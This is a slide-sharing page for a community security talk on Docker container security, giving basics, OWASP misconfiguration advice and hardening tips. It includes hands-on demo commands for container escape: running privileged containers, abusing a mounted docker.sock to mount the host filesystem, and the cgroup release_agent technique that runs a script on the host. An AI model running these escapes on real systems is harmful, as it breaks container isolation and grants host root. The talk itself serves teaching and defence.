Docker Decoded : From Basics to Breaches _Rakesh Seal
NullKolkata
16 views
15 slides
Oct 07, 2024
Slide 1 of 15
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
About This Presentation
Docker Decoded : From Basics to Breaches by Rakesh Seal
Slide Content
Docker Decoded: Basics to Breaches Explaining Container Security with hands on demo
$ whoami Rakesh Seal R&D, Keysight (ATI Research) Network Security Embedded Systems (IoT) Full Stack Dev Automation Enthusiast 15+ Patent Publication Play DoTA 👾 r akeshseal0.github.io
Docker Who?
Docker Architecture
Core Concepts
Image and Container Lifecycle (Hands On)
Docker Networking Bridge Host Overlay macvlan
Docker Security Layers
Common Docker Misconfigs Do not expose the Docker daemon socket Limit capabilities (Grant only specific capabilities, needed by a container) Prevent in-container privilege escalation Be mindful of Inter-Container Connectivity Limit resources (memory, CPU, file descriptors, processes, restarts) Set filesystem and volumes to read-only https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html
Demo-1 root Access from privileged container host Privileged container attacker Setup Container docker run -it --privileged ubuntu bash Verify Privileged Access (Check host devices) l s /dev Read Kernel Messages dmesg https://www.trendmicro.com/en_in/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html
Demo-2 Privilege Escalation (Host Socket Mounted) Setup Container docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu bash Search for Mounted Socket find / -name docker.sock 2>/dev/null Launch privileged container with full access apt update && apt install docker.io -y docker run -it --privileged -v /:/host ubuntu bash
Demo-3 Docker Escape cgroup Abuse Setup Container docker run -it ubuntu bash Mount in RDMA cgroup mkdir /tmp/cgrp mount -t cgroup -o rdma cgroup /tmp/cgrp mkdir /tmp/cgrp/xx Set Child Cgroup echo 1 > /tmp/cgrp/xx/notify_on_release host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent
Demo-3 Docker Escape cgroup Abuse Sh file echo '#!/bin/sh' > /cmd echo "ps aux > $host_path/output" >> /cmd echo "echo \"Greetings from rak3sh <3 \" >> $host_path/output" >> /cmd c hmod +x cmd Add process in our sub cgroup sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" Check Output of cmd cat /output
Runtime Security & Regular Updates 03 AppArmor, SELinux for more defense Regular updates and patching Secure configs 02 read-only fs Avoid unnecessary mounts Least Privilege 01 Reduc capabilities non-root Docker Security Best Practices
References Arigatou! ( ありがとう ) https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html https://docs.docker.com/engine/security/
Categories
TechnologyDownload
Download Slideshow Get the original presentation fileQuick Actions
Statistics
- Views 16
- Slides 15
- Age 424 days
Related Slideshows
11
8-top-ai-courses-for-customer-support-representatives-in-2025.pptx
JeroenErne2
50 views
10
7-essential-ai-courses-for-call-center-supervisors-in-2025.pptx
JeroenErne2
49 views
13
25-essential-ai-courses-for-user-support-specialists-in-2025.pptx
JeroenErne2
38 views
11
8-essential-ai-courses-for-insurance-customer-service-representatives-in-2025.pptx
JeroenErne2
36 views
21
Know for Certain
DaveSinNM
24 views
17
PPT OPD LES 3ertt4t4tqqqe23e3e3rq2qq232.pptx
novasedanayoga46
27 views